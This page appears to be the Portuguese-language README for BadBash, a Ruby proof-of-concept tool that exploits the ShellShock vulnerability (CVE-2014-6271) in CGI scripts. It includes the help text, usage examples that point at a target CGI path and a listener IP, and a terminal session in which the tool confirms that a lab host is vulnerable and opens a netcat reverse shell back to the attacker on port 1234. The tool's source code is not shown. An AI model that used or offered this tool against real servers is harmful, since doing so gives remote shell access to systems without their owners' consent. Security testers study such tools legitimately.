
CVE-2014-6271 (ShellShock) RCE PoC tool
CVE-2014-6271 (ShellShock) Ferramenta de PoC RCE
======= BadBash é uma ferramenta de exploração RCE para CVE-2014-6271. A versão básica apenas verifica o site CGI HTTP e fornece apenas um shell reverso netcat na porta 1234.
Desenvolvedor : Andy Yang Versão : 0.1.0 Licença : GPLv3
Projeto original no GitHub : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - Ferramenta RCE para CVE-2014-6271 por Andy Yang Versão básica apenas verifica site HTTP Versão básica apenas fornece shell reverso netcat na porta 1234
EXEMPLO DE USO:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path Caminho completo da página CGI
-d, --Destination IP Seu endereço IP que escuta uma conexão de entrada
-h, --help Exibir ajuda
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Verificando se o alvo é vulnerável........
[Info] Isso pode levar até 10 segundos........
[Info] Alvo está vulnerável!!!
[Info] Por favor, use NC para escutar na porta 1234 para shell reverso..........
[Info] Explorando para um shell reverso conectar 172.16.189.1:1234 via netcat ..........